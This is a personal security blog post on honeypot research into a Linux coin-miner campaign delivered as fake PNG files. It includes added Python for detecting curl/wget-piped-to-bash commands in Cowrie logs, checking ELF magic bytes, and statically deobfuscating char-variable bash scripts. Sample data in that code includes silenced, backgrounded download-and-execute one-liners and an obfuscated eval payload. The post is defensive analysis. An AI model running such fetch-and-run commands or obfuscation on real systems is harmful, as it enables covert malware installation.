That Time I Accidentally Burned A Malware Campaign

It's been ages since I've written here. Part of that has been down to being busy with life, projects and college work, but a large part has been down to the completely garbage editor that Ghost now uses, which isn't based on Markdown and turned a fantastic experience into one I despise: it is utterly frustrating to have written for years in Markdown and to have it taken away. But that's neither here nor there. What matters is that I've been busy working on some ideas, and it's time to share a small part of what I have been working on!

I've been playing with honeypots and honeynets for the best part of three months to see what kind of data I could usefully get out of them and, to be honest, the vast, vast majority of what I've seen has either not been very interesting, because it is low-effort, low-cost, opportunistic attacks, or, of the few that have stood out, has turned out on digging deeper to be much ado about nothing. The largest attacks I've seen have just been spammed out across the internet, have been noticed by many large and small security companies and have been analyzed to death, like the 5,201 samples of WannaCry I picked up, where the only discernible differences are a different crypto wallet address to deposit your ransom in or a different packer version.

Thinking I had spent an age working on something only to have nothing again, I took a chance and looked at something I wouldn't normally look at: what people were trying to do over SSH to my poor honeypot. And oh boy did I find something interesting!

Now it's not particularly weird to see an attacker check which user they are or gather system information, as both are useful for planning the next steps. But it's weird to see someone curl OR wget a script and pipe it to bash while sending all output to /dev/null, and not just that, running it in the background so the session returns immediately and nothing is left on screen. This was kind of irresistible, and I spent nearly every waking hour, if not thinking about this, then working on it and verifying that I was right and that I wasn't crazy.
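As an added example (my code, not the author's and not part of Cowrie), here is that pattern turned into detection logic and run over a few constructed Cowrie-style JSON log lines. It flags a cowrie.command.input event when a downloader (curl or wget) is piped straight into a shell, and records whether output was thrown at /dev/null and whether the job was backgrounded, which are the extra tells that separate this from a curious human. The field names (eventid, src_ip, input) follow Cowrie's JSON log format; the IPs and URLs are constructed and use reserved ranges.

```python
import json
import re

# Constructed Cowrie-style JSON log lines (not real honeypot data): one benign
# recon command, one curl-or-wget download piped to bash, silenced and
# backgrounded, one wget variant, and one unrelated login event.
SAMPLE_LOG = """
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","input":"uname -a; id"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.11","input":"(curl -fsSL http://example.invalid/pygo || wget -qO- http://example.invalid/pygo) | bash > /dev/null 2>&1 &"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.12","input":"wget -q -O - http://example.invalid/x.sh | sh >/dev/null 2>&1 &"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.13","username":"root","password":"123456"}
""".strip()

DOWNLOADER = re.compile(r"\b(curl|wget)\b")        # something fetches a payload
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")        # ...and feeds it to sh/bash
DEVNULL = re.compile(r">\s*/dev/null")               # output deliberately hidden
BACKGROUND = re.compile(r"&\s*$")                    # trailing & = run in background
URL = re.compile(r"https?://[^\s'\"|;)]+")


def score_command(cmd):
    """Return the list of download-and-execute indicators a shell command matches."""
    hits = []
    if DOWNLOADER.search(cmd):
        hits.append("downloader")
    if PIPE_TO_SHELL.search(cmd):
        hits.append("pipe_to_shell")
    if DEVNULL.search(cmd):
        hits.append("silenced")
    if BACKGROUND.search(cmd):
        hits.append("backgrounded")
    return hits


def find_download_and_execute(log_text):
    """Scan Cowrie JSON lines and report commands that fetch and run remote code."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("eventid") != "cowrie.command.input":
            continue
        cmd = event["input"]
        hits = score_command(cmd)
        # A downloader alone is noise; a downloader piped into a shell is the signal.
        if "downloader" in hits and "pipe_to_shell" in hits:
            findings.append({
                "src_ip": event["src_ip"],
                "urls": URL.findall(cmd),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for hit in find_download_and_execute(SAMPLE_LOG):
        print(hit)
```

The URL list is the useful output: those are the hosts (here the image hosting sites and the second-stage script host) that you then pivot on in Virus Total.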

Above is a snippet of the text that the command tries to execute. Essentially, if a number of conditions are met, it reaches out to a number of image hosting sites and pulls down an x32 or x64 "png" file and, failing that, it reaches out to another site and pulls down a second script.

This second script goes to two more "png" files and, failing that, it just cuts and runs to a malware distribution point to download the x32 or x64 versions directly.

If you try to look at the images, you get warnings like the one above from the image hosting sites saying that the image cannot be displayed because it contains errors, which is unusual for an image... If you download the "image" and open it in a text editor, you get an ELF header where a PNG signature should be, which is not the expected behaviour for an image: the files are Linux executables served under an image name.

Using sha1sum I got the hash and uploaded it to Virus Total. I'm not sure if it was me who found it first or not, but if it wasn't me, I was damn close! Using the Relations tab I was able to get the domains associated with the malware and map things out. The associated domains are the same domain three times, which isn't much use, but looking at the domain in VT Graph did allow me to see that it is related to other variants of Linux coin miners:
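To make the "is this really a PNG" check and the hashing step repeatable, here is an added example (my code, not the author's): it classifies a downloaded blob by its magic bytes rather than its file name, reads the ELF class to tell the x32 from the x64 build and the e_machine field for the architecture, and produces the same SHA-1 that sha1sum prints, which is what goes into the Virus Total search box. The sample headers are constructed, not the campaign's binaries.

```python
import hashlib
import struct

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"   # 8-byte PNG file signature
ELF_MAGIC = b"\x7fELF"             # ELF e_ident[EI_MAG0..EI_MAG3]
# Common e_machine values from the ELF spec; anything else is reported numerically.
MACHINES = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}


def identify(blob):
    """Classify a blob by its leading bytes, ignoring what the hosting site called it."""
    if blob.startswith(PNG_MAGIC):
        return {"type": "png"}
    if blob.startswith(ELF_MAGIC) and len(blob) >= 20:
        ei_class = blob[4]   # 1 = ELF32, 2 = ELF64
        ei_data = blob[5]    # 1 = little-endian, 2 = big-endian
        endian = "<" if ei_data == 1 else ">"
        # e_type and e_machine are the two 16-bit fields right after e_ident.
        e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
        return {
            "type": "elf",
            "bits": 32 if ei_class == 1 else 64,
            "machine": MACHINES.get(e_machine, e_machine),
            "e_type": e_type,   # 2 = ET_EXEC, 3 = ET_DYN
        }
    return {"type": "unknown"}


def sha1(blob):
    """Hex SHA-1 of the blob, identical to what sha1sum prints for the file."""
    return hashlib.sha1(blob).hexdigest()


def check_file(path):
    """Hash and classify one file on disk, e.g. a downloaded x64 'png'."""
    with open(path, "rb") as f:
        blob = f.read()
    return {"sha1": sha1(blob), **identify(blob)}


# Constructed sample headers (not the campaign's files): a genuine PNG signature,
# then a little-endian ELF64 x86-64 executable header and an ELF32 i386 one,
# each followed by zero padding so the header fields are readable.
SAMPLE_PNG = PNG_MAGIC + b"\x00\x00\x00\x0dIHDR"
SAMPLE_ELF64 = (ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8
                + struct.pack("<HH", 2, 0x3E) + b"\x00" * 44)
SAMPLE_ELF32 = (ELF_MAGIC + bytes([1, 1, 1, 0]) + b"\x00" * 8
                + struct.pack("<HH", 2, 0x03) + b"\x00" * 32)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, check_file(path))
    for name, blob in (("real.png", SAMPLE_PNG), ("x64.png", SAMPLE_ELF64), ("x32.png", SAMPLE_ELF32)):
        print(name, sha1(blob), identify(blob))
```

Run it with the downloaded "png" paths as arguments; a `type` of `elf` on something served as an image is the tell, and the `bits` field confirms which of the x32/x64 pair you are holding before you look the hash up.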

Also using VT Graph, I was able to map out a mental picture of how the attack worked end to end. I know that's not necessarily what VT Graph is for, but if you ever have to present your work in an easy-to-understand way for less digitally literate people, or if you want great pictures to describe attacks to professionals, VT Graph is perfect!

So if I can detect the command they are executing, can I see how they are logging in? Splunk can give me useful information, but as useful as it is, there's a slight problem:

If I take the IPs the attackers are using and search for the usernames and passwords used, I get zero results:

Now I have two theories as to why this is. The first, and most likely, is that my Splunk search is wrong and I need a logical operator before the first src term. The second is that there is a small gap in Cowrie's ability to log. I'm not exactly sure where this gap exists though. My working hypothesis is that since one of the connections issuing the commands is using the SSH-2.0-Go client, either Go is doing something unusual or the attacker is doing something unusual, and the only unusual thing I could think of was directly appending a command to the SSH login (ssh user@host 'command', which is sent as an exec request instead of opening an interactive shell session). So I tried that:

And I was able to execute this in bash and have everything run as intended in the background while trying to get it to execute as root, but it's never that simple, is it...

Cowrie didn't detect any of it, at all... Which leaves me with more questions about how than answers. I was hoping to dig deeper into why this is the case, but while preparing a presentation on this research I noticed that I had forgotten to save a copy of the pygo script, and oh boy am I glad I hadn't, because the attackers clearly weren't happy that myself and some other individuals had dumped their work into Virus Total and had updated their pygo script to be a series of char variables that are concatenated to form the script when executed.
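The char-variable trick is easy to unpick without running anything. Below is an added example, my own code rather than the attackers' script or the author's: it collects single-quoted, double-quoted and $'\xNN' assignments from a bash script, then expands the variable references inside the eval string to recover the command statically. The sample script is constructed to the shape described above; the exact syntax the real pygo script used is an assumption, and real samples vary (printf-built strings, base64, piping the assembled text to bash instead of eval), so treat the parser as a starting point rather than a general deobfuscator.

```python
import re

# Constructed sample in the shape described (the exact syntax is an assumption):
# one-character variables, some hidden behind $'\xNN' escapes, concatenated and
# handed to eval. Running it would execute "curl ... | bash"; we never run it.
SAMPLE = r"""
#!/bin/bash
v1='c'; v2='u'; v3='r'; v4='l'; v5=' '
v6=$'\x2d'; v7='s'; v8=$'\x4c'
v9=' http://example.invalid/x.png'
v10=$'\x7c'; v11='b'; v12='a'; v13='s'; v14='h'
eval "$v1$v2$v3$v4$v5$v6$v7$v8$v9$v5${v10}$v5$v11$v12$v13$v14"
"""

# name='...'  |  name="..."  |  name=$'...'  (ANSI-C quoting), at line start or after ; or space
ASSIGN = re.compile(r"""(?:^|[;\s])(\w+)=(?:'([^']*)'|"([^"]*)"|\$'([^']*)')""", re.M)
EVAL = re.compile(r'eval\s+"([^"]*)"')
VAR = re.compile(r"\$\{(\w+)\}|\$(\w+)")


def decode_ansi_c(s):
    """Expand the \\xNN escapes bash's $'...' quoting allows; other escapes are left alone."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def collect_assignments(script):
    """Build a name -> value map from every simple assignment in the script."""
    env = {}
    for m in ASSIGN.finditer(script):
        name, single, double, ansi = m.groups()
        if ansi is not None:
            env[name] = decode_ansi_c(ansi)
        else:
            env[name] = single if single is not None else double
    return env


def expand(text, env):
    """Substitute $name / ${name}; unknown names expand to "" as bash would."""
    return VAR.sub(lambda m: env.get(m.group(1) or m.group(2), ""), text)


def deobfuscate(script):
    """Return the command string each eval in the script would have executed."""
    env = collect_assignments(script)
    return [expand(m.group(1), env) for m in EVAL.finditer(script)]


if __name__ == "__main__":
    for cmd in deobfuscate(SAMPLE):
        print(cmd)
```

The recovered string is what you hash and submit, and its URLs are the next hosts to pivot on; the variable map itself is also worth keeping, since the same fragments tend to be reused between revisions of a script.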

And of course I had to go and burn this too, because you just can't leave them like that. I left links to Virus Total along with hashes, a list of all the domains and the details of the C2 servers, and anywhere I used a VT Graph I made, I left a link to the graph in the caption too. Happy digging if you want to!

Going forward, I've been thinking a lot more about honeypots for specific, targeted information, such as EternalPot by Kevin Beaumont, though tailored to something more interesting to me personally. I've also been thinking about using something with a much better packet-capture capability than I can see Splunk has, such as QRadar or The Hive, and playing back what attackers do like in Azure Sentinel, or having a better capability for malware analysis, or better ways to automatically send data to Virus Total, Malice or MISP to get reports back or help do a deeper analysis than I currently can with the limited time and resources I have. Or maybe just a further dive into automating the malware analysis or doing some data mining to make further work on this less time-intensive for me, since it consumed five full days I really couldn't afford to give to it... Failing that, I've also been reading a lot about how computer vision systems can be fooled and how you can defeat facial recognition systems using commodity hardware.

So I guess I've tons of ideas to work away on, I just need to find the time.

SHA1 Hashes:
a64/b64/c64/urlx64/urlx642 Malware dec3575c3630d0c16841b559875bc5d572459691
a32/b32/c32/urlx32/urlx322 Malware 132f8a76587f7c1d2a424be948b01ac704b820e9
pygo script 1dd32cb1bcf7f871d9eca24c2c60860153f189b6
pygo char() script 253f9302de8b353c0d08d64edebcbe2cc00e3a56

Suspected C2 Servers or Coin Mining Pools:


Paddy Kerley